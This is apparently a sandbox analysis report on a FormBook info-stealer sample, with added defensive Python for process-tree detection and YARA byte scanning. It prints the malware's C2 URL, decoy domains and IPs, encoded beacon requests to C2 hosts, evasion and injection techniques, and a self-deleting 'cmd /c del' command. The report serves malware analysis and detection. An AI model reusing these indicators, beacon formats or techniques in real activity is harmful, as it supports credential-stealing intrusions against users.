Analysis Report cryptedprof.exe

Overview

General Information

Sample Name: cryptedprof.exe
Analysis ID: 356722
MD5: 72efe20e4a59ae2722383b8786956994
SHA1: 453b2af3b318668926087556eebfa93eda75d2df
SHA256: d8e0edf1cca3b6edefcd830e233131c593997b5bd4454891dc1b70614862f718
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • cryptedprof.exe (PID: 6980 cmdline: 'C:\Users\user\Desktop\cryptedprof.exe' MD5: 72EFE20E4A59AE2722383B8786956994)
    • cryptedprof.exe (PID: 7064 cmdline: 'C:\Users\user\Desktop\cryptedprof.exe' MD5: 72EFE20E4A59AE2722383B8786956994)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 984 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 6592 cmdline: /c del 'C:\Users\user\Desktop\cryptedprof.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
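The Startup tree above is the whole FormBook chain in six processes: the dropper starts a second copy of itself (the suspended child that gets hollowed), the payload lands in explorer.exe, explorer.exe launches a 32-bit system utility (msdt.exe) with no arguments to host the final stage, and that utility runs cmd.exe /c del to remove the original file. The report says no Sigma rule matched, so here is an added example of detection logic over that chain; it is my code, not part of the Joe Sandbox report. The event records are constructed from the tree on this page (same PIDs and command lines); the paths for explorer.exe and cmd.exe, the field names and the rule names are my assumptions, and the explorer.exe edge is kept as a parent link only because the tree draws it that way (it is really an injection edge).

```python
import ntpath
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the created process
    cmdline: str   # command line as the report prints it


# Constructed from the Startup tree on this page. PID 6980 gets ppid 0 (it was
# started by the sandbox). The explorer.exe and cmd.exe paths are assumptions:
# the report shows only the file names for those two.
EVENTS = [
    ProcEvent(6980, 0, r"C:\Users\user\Desktop\cryptedprof.exe", r"'C:\Users\user\Desktop\cryptedprof.exe'"),
    ProcEvent(7064, 6980, r"C:\Users\user\Desktop\cryptedprof.exe", r"'C:\Users\user\Desktop\cryptedprof.exe'"),
    ProcEvent(3440, 7064, r"C:\Windows\explorer.exe", ""),
    ProcEvent(984, 3440, r"C:\Windows\SysWOW64\msdt.exe", r"C:\Windows\SysWOW64\msdt.exe"),
    ProcEvent(6592, 984, r"C:\Windows\SysWOW64\cmd.exe", r"/c del 'C:\Users\user\Desktop\cryptedprof.exe'"),
    ProcEvent(6608, 6592, r"C:\Windows\system32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# "/c del [/f /q ...] <path>" with or without quotes around the path.
DEL_RE = re.compile(r"""/c\s+del\s+(?:/[a-z]\s+)*['"]?([^'"]+?)['"]?\s*$""", re.I)


def norm(path: str) -> str:
    """Case-fold and strip surrounding quotes so paths compare equal."""
    return path.strip().strip("'\"").lower()


def detect(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule_name, pid) for every event that matches one of three rules."""
    by_pid = {e.pid: e for e in events}
    seen_images = {norm(e.image) for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        img = norm(e.image)
        # Rule 1: a process starting a second copy of its own image, the shape
        # behind "Creates a process in suspended mode" and process hollowing.
        if parent and norm(parent.image) == img:
            hits.append(("self_spawn_same_image", e.pid))
        # Rule 2: explorer.exe starting a SysWOW64 utility with an empty
        # argument list; here msdt.exe, which then hosts the FormBook payload.
        if parent and ntpath.basename(norm(parent.image)) == "explorer.exe" \
                and img.startswith("c:\\windows\\syswow64\\"):
            args = norm(e.cmdline).replace(img, "", 1).strip()
            if args == "":
                hits.append(("explorer_spawns_syswow64_noargs", e.pid))
        # Rule 3: cmd.exe /c del of a path that is the image of a process seen
        # in the same trace (the dropper removing itself after injection).
        if ntpath.basename(img) == "cmd.exe":
            m = DEL_RE.search(e.cmdline)
            if m and norm(m.group(1)) in seen_images:
                hits.append(("cmd_deletes_seen_image", e.pid))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:32s} pid={pid}")
```

Rule 3 matches on any image seen in the trace rather than on the ancestor chain, because on a real host msdt.exe's parent is explorer.exe and explorer.exe's parent is not the dropper; the injection edge the sandbox draws does not exist in process-creation logs.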

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.warungsuntik.com/rcv/"], "decoy": ["dorlandoconstruction.com", "houswifekelly.com", "thunderprnet.com", "licipo.com", "ecocotte.com", "xt.show", "sneakerbyhailss.com", "xn--xcke3b8f283o9jzd.com", "1915dobbindr.com", "njbroncosfootball.com", "xn--missrosmakeup-vhb.com", "poertz.com", "20gb-internett-hediye.com", "legalprotech.com", "smarttechnetworks.com", "jamusedwards.com", "smartsettleinfinity.com", "dizesh.com", "gnoccho.com", "historyzapper.com", "sdponcologypatientaid.com", "tabandolano.online", "iveysmotorlodgeme.com", "e-market88.com", "carpetlaunch.com", "creativeladder.net", "bjhysz.com", "befton.ovh", "kehadiransiswa.online", "trunglet.com", "warrenswelding.online", "sculptedspa.com", "avalon78m.online", "diverseworker.com", "sounongwang.com", "sanaugustinegardenresort.com", "active-trinity.com", "thatlocaljawn.com", "myadamandsteve.com", "yourbestpprazdnik.club", "pop2.online", "gavinlurssen.com", "everybodywantstobfamous.com", "shegimx.com", "qbluebaypanowdbuy.com", "peatedbrandy.online", "weightsandweed.com", "remotepowers.com", "yangguangdiannao.com", "ruecedu.com", "honeybadgerpodcast.com", "ivario.cloud", "indeep-events.com", "luzshoesr.online", "lanskyee.com", "chinalsgroup.com", "divanna-box.site", "reginajewerlyco.com", "voshtravels.com", "isahil.tech", "smartloanbuilder.net", "dojosinaptico.com", "finik.clinic", "columbus-luxury-hotels.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

Source | Rule | Description | Author | Strings
3.2.cryptedprof.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.cryptedprof.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.cryptedprof.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
1.2.cryptedprof.exe.2a60000.5.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.cryptedprof.exe.2a60000.5.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
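Two things in the Yara Overview are worth checking by hand. First, the yara-signator and JPCERT strings hit at identical offsets in the 3.1, 3.2 and 1.2 dumps (0x98e8, 0x18409 and so on), which is what you expect when the same unpacked image is written into each process. Second, the three JPCERT strings are each a five-byte `push imm32` (opcode 0x68), and `$sequence_0` is `add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax`, the timing primitive behind the "Tries to detect virtualization through RDTSC time measurements" signature. The block below is an added example, not code from the report or from either rule's author: it compiles the page's hex strings into byte regexes, scans a buffer, decodes the push operands, and compares offset fingerprints across dumps. The buffer it scans is constructed (zero-filled with the sequences planted at the reported offsets), not a real memory dump.

```python
import re

# Strings copied from the two community rules in the Yara Overview above.
SEQUENCES = {
    "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    "$sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
    "$sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
    "$sqlite3step": "68 34 1C 7B E1",
    "$sqlite3text": "68 38 2A 90 C5",
    "$sqlite3blob": "68 53 D8 7F 8C",
}

# Offsets the report lists for those strings; the same in all three dumps.
REPORTED = {
    "$sequence_0": [0x98E8, 0x9B62],
    "$sequence_5": [0xA57A],
    "$sequence_9": [0x1C32A],
    "$sqlite3step": [0x18409, 0x1851C],
    "$sqlite3text": [0x18438, 0x1855D],
    "$sqlite3blob": [0x1844B, 0x18573],
}


def hex_pattern(spec: str):
    """Compile a YARA-style hex string ('??' wildcards allowed) to a bytes regex."""
    parts = [b"." if tok == "??" else re.escape(bytes.fromhex(tok)) for tok in spec.split()]
    return re.compile(b"".join(parts), re.DOTALL)


def scan(buf: bytes, sequences=SEQUENCES) -> dict:
    """Return {name: ascending offsets} for every sequence present in buf."""
    hits = {}
    for name, spec in sequences.items():
        offs = [m.start() for m in hex_pattern(spec).finditer(buf)]
        if offs:
            hits[name] = offs
    return hits


def push_imm32(spec: str):
    """Operand of a five-byte 'push imm32' (opcode 0x68), else None."""
    b = bytes.fromhex(spec.replace(" ", ""))
    if len(b) == 5 and b[0] == 0x68:
        return int.from_bytes(b[1:], "little")
    return None


def fingerprint(hits: dict) -> frozenset:
    """(name, offset) pairs; equal fingerprints for dumps taken from different
    processes mean the same unpacked image was written into each of them."""
    return frozenset((n, o) for n, offs in hits.items() for o in offs)


def build_dump(size: int = 0x1D000, planted=REPORTED) -> bytes:
    """Constructed stand-in for a .unpack dump: zeros with the sequences placed
    at the reported offsets. Not a real memory dump."""
    buf = bytearray(size)
    for name, offs in planted.items():
        raw = bytes.fromhex(SEQUENCES[name].replace(" ", ""))
        for off in offs:
            buf[off:off + len(raw)] = raw
    return bytes(buf)


if __name__ == "__main__":
    dump = build_dump()
    for name, offs in scan(dump).items():
        imm = push_imm32(SEQUENCES[name])
        extra = f"  push 0x{imm:08X}" if imm is not None else ""
        print(f"{name:14s} {[hex(o) for o in offs]}{extra}")
```

Run it against a real `.unpack` file by replacing `build_dump()` with `open(path, "rb").read()`; if the offsets come out shifted by a constant, the dump was taken at a different base and the fingerprint should be compared relative to the first hit.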

          Sigma Overview

          No Sigma rule has matched

          Signature Overview


          AV Detection:

Found malware configuration
Source: 3.2.cryptedprof.exe.400000.0.raw.unpack | Malware Configuration Extractor: FormBook (the configuration listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: cryptedprof.exe | ReversingLabs: Detection: 27%
Yara detected FormBook
Source: Yara match | File source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: cryptedprof.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 3.1.cryptedprof.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.cryptedprof.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.cryptedprof.exe.2a60000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

Uses 32bit PE files
Source: cryptedprof.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: cryptedprof.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000005.00000000.354086786.000000000DC20000.00000002.00000001.sdmp
Source: Binary string: msdt.pdbGCTL | source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: cryptedprof.exe, 00000001.00000003.334189202.0000000002C50000.00000004.00000001.sdmp, cryptedprof.exe, 00000003.00000002.388641562.0000000000BAF000.00000040.00000001.sdmp, msdt.exe, 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: cryptedprof.exe, msdt.exe
Source: Binary string: msdt.pdb | source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000005.00000000.354086786.000000000DC20000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,1_2_00405A15
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_004065C1 FindFirstFileA,FindClose,1_2_004065C1
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_004027A1 FindFirstFileA,1_2_004027A1
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 4x nop then pop ebx | 3_2_00407AFA
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4x nop then pop ebx | 7_2_02C67AFB

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 111.221.46.49:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 111.221.46.49:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 111.221.46.49:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.warungsuntik.com/rcv/
Source: global traffic | HTTP traffic detected: GET /rcv/?VRNh=cg6bZkxEcNPMAIRmM8GPonkuA9GKh0BFEGdQJ3UU0rDFwE5vgU0uCiOyxYirtUdr8QJdvBkiGw==&jL08l2=WXL00450GFoHk HTTP/1.1 | Host: www.thatlocaljawn.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven 0x00 bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /rcv/?VRNh=pIfKS/hEN6BRYAYnpceiijGTuCPe5XtNGOPRhmV5L9BR4RtlzZsfp+6kyczwPilyRouSrFb70A==&jL08l2=WXL00450GFoHk HTTP/1.1 | Host: www.warungsuntik.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven 0x00 bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /rcv/?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk HTTP/1.1 | Host: www.tabandolano.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven 0x00 bytes, nothing printable)
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 34.102.136.180
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: GOOGLEUS
Source: Joe Sandbox View | ASN Name: CLAYERLIMITED-AS-APClayerLimitedHK
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /rcv/?VRNh=cg6bZkxEcNPMAIRmM8GPonkuA9GKh0BFEGdQJ3UU0rDFwE5vgU0uCiOyxYirtUdr8QJdvBkiGw==&jL08l2=WXL00450GFoHk HTTP/1.1 | Host: www.thatlocaljawn.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven 0x00 bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /rcv/?VRNh=pIfKS/hEN6BRYAYnpceiijGTuCPe5XtNGOPRhmV5L9BR4RtlzZsfp+6kyczwPilyRouSrFb70A==&jL08l2=WXL00450GFoHk HTTP/1.1 | Host: www.warungsuntik.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven 0x00 bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /rcv/?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk HTTP/1.1 | Host: www.tabandolano.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven 0x00 bytes, nothing printable)
Source: unknown | DNS traffic detected: queries for: www.thatlocaljawn.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 23 Feb 2021 14:32:22 GMT | Content-Type: text/html | Content-Length: 479 | Connection: close | ETag: "601d0d01-1df" | Body (479 bytes, decoded from the raw hex as UTF-8):
<!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404，您请求的文件不存在!</h3></body></html>
The <h3> text is Chinese for "404, the file you requested does not exist!"; the report's ASCII rendering dropped the non-ASCII characters.
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: cryptedprof.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: cryptedprof.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.338525692.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: msdt.exe, 00000007.00000002.594068714.000000000508F000.00000004.00000001.sdmp | String found in binary or memory: http://www.tabandolano.online/cgi-sys/suspendedpage.cgi?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNv
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_004054B2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_004054B2
